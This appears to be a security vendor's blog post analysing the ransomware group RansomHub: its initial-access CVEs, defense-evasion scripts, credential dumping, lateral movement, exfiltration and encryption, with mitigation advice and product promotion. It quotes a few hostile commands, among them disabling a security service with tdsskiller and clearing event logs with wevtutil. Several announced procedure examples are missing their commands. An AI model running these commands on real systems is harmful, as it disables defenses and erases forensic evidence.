RansomHub: Analyzing the TTPs of One of the Most Notorious Ransomware Variants of 2024

RansomHub, a ransomware-as-a-service variant formerly known as Cyclops and Knight, has become one of the most pervasive threats to critical sectors—from water and wastewater systems to healthcare and transportation. Leveraging a double-extortion model, RansomHub encrypts systems and exfiltrates data while demanding ransoms from victims. 

This blog breaks down the group’s tactics, techniques, and procedures (TTPs) across the entire attack chain. This analysis also highlights critical vulnerabilities and provides actionable mitigation recommendations.

Infection Chain Overview of RansomHub Attacks

RansomHub’s attack chain follows a structured progression:

• Initial Access: The group gains entry via spear-phishing, exploitation of internet-facing vulnerabilities, and password spraying.

• Execution & Defense Evasion: Once inside, affiliates deploy malicious scripts to disable security tools, clear logs, and disguise the ransomware binary.

• Persistence & Privilege Escalation: Creation and reactivation of user accounts, coupled with the use of tools such as Mimikatz, help maintain access and elevate privileges.

• Discovery & Lateral Movement: Network scanners and legitimate remote access tools (e.g., AnyDesk, PsExec) are repurposed to map out systems and move laterally.

• Credential Access: Dumping credentials (e.g., LSASS memory) provides the means for deeper network compromise.

• Exfiltration: Data is selectively exfiltrated using tools like Rclone and cloud transfer methods, often over asymmetric protocols.

• Impact: The final stage sees the encryption of files using robust cryptographic algorithms (e.g., Curve 25519) and deletion of Volume Shadow Copies to thwart recovery.

Analyzing RansomHub Ransomware’s Advanced Tactics, Techniques, and Procedures (TTPs)

TA0001: Initial Access Methods

Phishing: Spearphishing Link [T1566.002]

RansomHub affiliates send crafted phishing emails to lure victims into clicking malicious links or downloading compromised attachments, which contain exploits for known CVEs to gain a foothold in organizations’ IT environments. The relevant CVEs are listed below in this section.

Exploit Public-Facing Application [T1190]

Below is a list of CVEs that RansomHub affiliates have been observed exploiting for initial access. Notably, many of these exploits are publicly available on platforms such as GitHub or ExploitDB, indicating that convenience was a priority for the affiliates rather than developing their own exploits.

• CVE-2023-3519: A vulnerability in Citrix ADC (NetScaler) that allows remote code execution as root via a stack buffer overflow in the NSPPE process triggered by a crafted HTTP GET request. (Publicly available PoC can be accessed here.)

• CVE-2023-27997: A heap-based buffer overflow vulnerability in multiple versions of FortiOS and FortiProxy SSL-VPN that enables remote code execution through specially crafted requests. (Publicly available PoC can be accessed here.)

• CVE-2023-46604: A vulnerability in the Java OpenWire protocol marshaller (e.g., in Apache ActiveMQ) that permits a remote attacker to execute arbitrary shell commands by manipulating serialized class types. (PoC can be accessed here.)

• CVE-2023-22515: A vulnerability in publicly accessible Confluence Data Center and Server instances that allows the creation of unauthorized administrator accounts, leading to unauthorized access. (PoC can be accessed here.)

• CVE-2023-46747: A vulnerability in BIG-IP systems that allows an attacker to bypass configuration utility authentication and execute arbitrary commands via undisclosed crafted requests (note that EoTS versions are not evaluated). (PoC can be accessed here.)

• CVE-2023-48788: A SQL injection vulnerability in Fortinet FortiClientEMS that can be exploited via specially crafted packets to execute unauthorized commands. (PoC can be exploited here.)

• CVE-2017-0144: The SMBv1 vulnerability (commonly known as EternalBlue) that allows remote code execution on affected Microsoft Windows systems via crafted packets. (This one is really old, and widely known – PoC can be accessed here.)

• CVE-2020-1472 – One of the most prominently observed CVEs exploited by RansomHub: a critical elevation of privilege vulnerability (Zerologon) in the Netlogon secure channel protocol, which allows attackers to establish an insecure connection to a domain controller. (A publicly available exploit can be accessed here.)

• CVE-2020-0787: A vulnerability potentially exploited alongside Zerologon to facilitate further privilege escalation.

These vulnerabilities are leveraged during initial access to compromise internet-facing systems and user endpoints, often via phishing, exploitation, and password spraying techniques.

Brute Force: Password Spraying [T1110.003]

In some cases, RansomHub affiliates have been observed relying on valid accounts compromised in previous breaches, which are then targeted with low-volume, high-success password attempts. 

TA0007: Discovery

Remote System Discovery [T1018]

RansomHub operators have been observed utilizing tools such as AngryIPScanner and Nmap to systematically scan and enumerate systems based on IP addresses or hostnames. These tools enable attackers to map the network infrastructure, identify active devices, and pinpoint potential targets for further exploitation.

Procedure Example:

Extensive network scanning enables attackers to build a map of the compromised environment, setting the stage for lateral movement.

How Do We Help?

One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves testing the ingress tool transfer of AngryIPScanner to the system.

Network Service Discovery [T1046]

In addition, RansomHub was observed leveraging PowerShell-based “living off the land” methods to help identify running services and network configurations.

TA0005: Defense Evasion

Disabling Security Tools [T1562.001] & Indicator Removal [T1070]

RansomHub affiliates leverage WMI and various other techniques to disable endpoint detection and response (EDR) tools and antivirus solutions. 

Below is a list of files executed by RansomHub to evade detection, erase log files, and eliminate forensic artifacts, making analysis and incident response significantly more challenging.

232.bat

• Uses a brute-force password spraying technique and disables Windows Defender’s real-time monitoring.

tdsskiller.bat

• Modifies the Windows Registry to set explorer.exe as the default shell for users logging into the system.
• Utilizes taskkill with filters and wildcards to forcibly terminate specified processes.
• Additionally, it runs “C:\Windows\tdsskiller.exe” with the command parameter -dcsvc "TMBMServer" -accepteula to disable the TMBMServer service (Trend Micro Unauthorized Change Prevention Service), automatically accepting the EULA to avoid prompts.

killdeff.bat

• Contains an obfuscated PowerShell script designed to toggle Windows Defender settings for malicious purposes.
• The script manipulates registry entries, alters Windows Defender and notification settings, and attempts privilege escalation by abusing low-level interactions to bypass UAC.

LogDel.bat

• Alters system file attributes by executing a command such as attrib Default.rdp -s -h to remove the system and hidden attributes from the Default.rdp file, making it more accessible for tampering.
• Modifies the Windows Registry key at HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers, potentially changing Remote Desktop Protocol (RDP) settings to facilitate unauthorized remote access.
• Clears Windows Event Logs using wevtutil.exe (e.g., wevtutil.exe cl "Application"), erasing traces of malicious activities and hindering forensic investigations.

EDRKillShifter:

• Functions as a “loader” executable that delivers a legitimate driver susceptible to abuse, thus disabling antivirus and EDR solutions—a technique often referred to as “bring your own vulnerable driver” (BYOVD).
• Its execution process involves three main steps:
  • First, it is executed with a command-line argument that includes a password.
  • Second, when executed with the correct password, it decrypts an embedded resource (data.bin) and runs it in memory.
  • Third, the second-stage payload decrypts and executes the final payload, which drops the vulnerable driver to disable EDR protection.
  • Additionally, EDRKillShifter creates a Windows service (svc.exe), which further aids in disabling the targeted security applications.

Each of these techniques plays a critical role in evading detection and maintaining persistence within the target environment.

How Do We Help?

A threat added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves testing information gathering on antivirus programs using tools such as WMIC, as well as clearing all event logs to severely impair forensic analysis.

TA0003: Persistence

Account Creation [T1136]

After initial compromise, RansomHub affiliates create new user accounts or reactivate disabled accounts to ensure ongoing access.

Scheduled Tasks & Scripts

Persistence is often maintained via scheduled tasks that re-execute malicious payloads at system startup.

TA0004: Privilege Escalation & Credential Access

Account Manipulation [T1098]

Changing account permissions or re-enabling accounts allows attackers to gain administrative privileges.

How Do We Help?

A threat added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves discovery of disabled user accounts, or creating new ones.

Exploitation of LSASS [T1003]

RansomHub uses tools like Mimikatz to dump LSASS memory and harvest credentials.

Procedure Example:
An attacker may run the following command using Mimikatz to extract credentials.

This command provides access to Kerberos tickets and clear-text passwords stored in memory. The ability to dump credentials can lead to widespread lateral movement across the network, magnifying the impact of the breach.

How Do We Help?

One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves leveraging Mimikatz tool to LSASS memory dumping (a.k.a credential dumping) – where the gathered credentials to be used in lateral movement or priv-esc.

TA0008: Lateral Movement

Exploitation of Remote Services [T1210]

Using vulnerabilities in remote services, RansomHub operators gain access to internal systems.

Remote Desktop Protocol (RDP) [T1021.001] & Tools like PsExec [S0029]

Legitimate remote access tools are repurposed for malicious lateral movement.

How Do We Help?

One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves testing the execution of PsExec.

Use of AnyDesk [T1219] 

Even legitimate remote control software can be exploited to maintain command-and-control (C2). In some cases, RansomHub was observed leveraging AnyDesk tool for RCE.

Procedure Example:
An affiliate might use PsExec to remotely execute commands on a target machine:

Lateral movement using trusted tools makes it difficult for defenders to distinguish between normal administrative activity and malicious actions.

How Do We Help?

One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves testing the downloading AnyDesk portable version.

TA0010: Data Exfiltration

Exfiltration Over Alternative Protocols [T1048.002, T1048.003]

Data is often exfiltrated using unencrypted or asymmetrically encrypted channels. (More on this will be discussed in the Impact section).

Cloud Transfers [T1537]

Affiliates may leverage cloud storage services to transfer sensitive data.

Procedure Example:
A command using Rclone might be structured as follows to exfiltrate files:

The use of common file transfer tools for data exfiltration complicates detection efforts, as network traffic may appear benign.

TA0040: Impact – Encryption and System Disruption

File Encryption Using Curve 25519 [T1486]

RansomHub typically employs an elliptic curve encryption algorithm that is unique to each victim organization. Files are encrypted in intermittent chunks and appended with metadata—including a public encryption key and checksum—to support decryption (if a ransom is paid).

Procedure Example:
A sample ransomware note may instruct the victim to visit a unique .onion URL and provide a client ID, while the ransomware appends a new extension (e.g., “.1d7fdb”) to encrypted files.

How Do We Help?

One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves encrypting a dummy file with Curve 25519 Generated Symmetric Key.

As you can see here, with Picus, you can test your EDR solutions not only against encrypting files but also against writing a ransom note!

Inhibit System Recovery [T1490]

The ransomware deletes Volume Shadow Copy Service (VSS) snapshots using commands such as:

These commands ensure that recovery options are eliminated.

How Do We Help?

One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves deleting shadow copies by using Vssadmin.

The irreversible deletion of backups and shadow copies, coupled with strong encryption, leaves organizations with few recovery options.

How Does Picus Help Against RansomHub Ransomware Threat Group?

We strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their attacks using the Picus Security Validation Platform.  

Picus Threat Library includes the following threats for RansomHub Ransomware.

Defense Strategies Against RansomHub Ransomware Attacks

Given the complex and evolving nature of RansomHub, organizations must implement a layered defense strategy:

Patch Management & Vulnerability Mitigation

• Immediately install updates for operating systems, software, and firmware.
• Prioritize patching known vulnerabilities (e.g., Citrix ADC, FortiOS, Netlogon).

Enhanced Endpoint Protection

• Deploy phishing-resistant MFA and enforce strong password policies.
• Use updated EDR solutions that incorporate behavioral analytics and heuristic scanning.

Network Segmentation & Monitoring

• Segment networks to restrict lateral movement.
• Use continuous network monitoring and logging to detect anomalous scanning or file transfers.

Credential Security

• Monitor for unusual LSASS activity and use privileged access management solutions to secure credentials.
• Regularly audit and review account privileges and promptly remove or disable unauthorized accounts.

Data Backup & Recovery

• Maintain offline, immutable backups of critical data and ensure they are segmented from the primary network.
• Test recovery procedures regularly to verify backup integrity.

Security Awareness & Incident Response

• Train users to recognize phishing attempts and report suspicious activity.
• Develop and regularly update an incident response plan that includes steps for isolating compromised systems and notifying appropriate authorities.

Conclusion

RansomHub represents one of the most significant ransomware threats of 2024, leveraging advanced TTPs to infiltrate networks, escalate privileges, and exfiltrate data before encrypting critical systems. The group’s reliance on publicly available exploits and stealthy defense evasion techniques makes it a formidable adversary for organizations across multiple sectors.

To effectively mitigate the risks posed by RansomHub, organizations must adopt a proactive security strategy that includes robust patch management, endpoint protection, network segmentation, and credential security. Regular security validation, such as Picus Security’s simulation capabilities, enables defenders to test and enhance their security controls against emerging ransomware tactics. By staying vigilant and continuously strengthening defenses, organizations can reduce their exposure to ransomware attacks and safeguard their critical assets.